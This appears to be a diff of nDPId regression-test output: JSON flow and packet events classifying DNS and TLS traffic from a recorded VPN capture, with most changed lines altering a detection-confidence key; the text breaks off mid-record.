+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569687251230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1569687251230,"pkt":"NDY7z3UoLH6BsEqhCABFAACPAABAADYRoeRLS0xMCgAA4wA11kMAe\/FSpheBgwABAAAAAQAABXByaW50BnZpYXNhdANjb20AAAEAAcASAAYAAQAAA4QARQZucy02MzIJYXdzZG5zLTE1A25ldAARYXdzZG5zLWhvc3RtYXN0ZXIGYW1hem9uwBkAAAABAAAcIAAAA4QAEnUAAAFRgA=="} -00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":122,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687251230,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":122,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687251230,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569687255989,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1569687255989,"pkt":"LH6BsEqhNDY7z3UoCABFAAA3enMAAP8RnsgKAADjS0tMTOMrADUAI5+UjycBAAABAAAAAAAABXNsYWNrA2NvbQAAAQAB"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569687256018,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569687256018,"pkt":"NDY7z3UoLH6BsEqhCABFAABHAABAADcRoSxLS0xMCgAA4wA14ysAM\/asjyeBgAABAAEAAAAABXNsYWNrA2NvbQAAAQABwAwAAQABAAAAIwAEY1YinA=="} -00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"99.86.34.156"}} +00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"99.86.34.156"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687256018,"flow_last_seen":1569687256018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569687256018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687256018,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGqeMKAADjY1YinN5YAbvhhxKGAAAAALAC\/\/8SKwAAAgQFtAEDAwUBAQgKHA2jzgAAAAAEAgAA"} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569687256050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687256050,"pkt":"NDY7z3UoLH6BsEqhCABFAAA8AABAAO4G++ZjViKcCgAA4wG73lg6Ai8I4YcSh6AScSDdlgAAAgQFtAQCCApVvxWbHA2jzgEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569687256050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687256050,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGqe8KAADjY1YinN5YAbvhhxKHOgIvCYAQEBVtUAAAAQEIChwNo+1VvxWb"} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569687259269,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1569687259269,"pkt":"AQBeAAD7GIEORo7ICABFAACMyOAAAP8RBrAKAADV4AAA+xTpFOkAeGDGAAAAAAADAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMgAEAACkFoAAAEZQAEgAEAA4AmzqBDkaOyBiBDkaOyA=="} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569687259270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"thread_ts_msec":1569687259270,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AHgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QB4u7wAAAAAAAMAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAyAAQAAKQWgAAARlAASAAQADgCbOoEORo7IGIEORo7I"} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1569687259297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687259297,"pkt":"GIEORo7INDY7z3UoCABFAAEEsFAAAP8R9OAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="} @@ -129,47 +129,47 @@ 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569687260293,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1569687260293,"pkt":"AQBeAAD7GIEORo7ICABGAAAgpGYAAAEClKEKAADV4AAA+5QEAAAWAAkE4AAA+w=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7580000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569687260469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"thread_ts_msec":1569687260469,"pkt":"LH6BsEqhNDY7z3UoCABFAABaAABAAEAGj+kKAADjI8l8Cd5OAbsN94yysPePlIAYEACJPAAAAQEIChwNtRgGQIQkFwMDACEAAAAAAAAAA3VW6sM2CHDT\/Oy2e1MF3bFmEvrGQamtRJY="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7580000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260469,"flow_last_seen":1569687260469,"flow_idle_time":7580000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":1,"thread_ts_msec":1569687260469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569687260489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260489,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0Bk0AAHoGj8IjyXwJCgAA4wG73k6w94+UDfeM2IAQAPROCgAAAQEICgZA6j4cDbUY"} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1569687260521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569687260521,"pkt":"NDY7z3UoLH6BsEqhCABFAABUBk4AAHoGj6EjyXwJCgAA4wG73k6w94+UDfeM2IAYAPS6xgAAAQEICgZA6l4cDbUYFwMDABsAAAAAAAAABNY2znqkTRgDlTqE63fXsBbyQmM="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260591,"flow_last_seen":1569687260591,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687260591,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569687260591,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260591,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGxu4KAADjCCVgwt5ZEL8UzEFoAAAAALAC\/\/+sRwAAAgQFtAEDAwUBAQgKHA21kQAAAAAEAgAA"} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569687260620,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687260620,"pkt":"NDY7z3UoLH6BsEqhCABFAABAE+xAAPEGAgIIJWDCCgAA4xC\/3lkWZHs7FMxBabASECzSsgAAAgQFZAEDAwIBAQgKeKa\/ZBwNtZEEAgAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569687260620,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687260620,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGxvoKAADjCCVgwt5ZEL8UzEFpFmR7PIAQEAgSNwAAAQEIChwNta14pr9k"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01539{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01539{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": 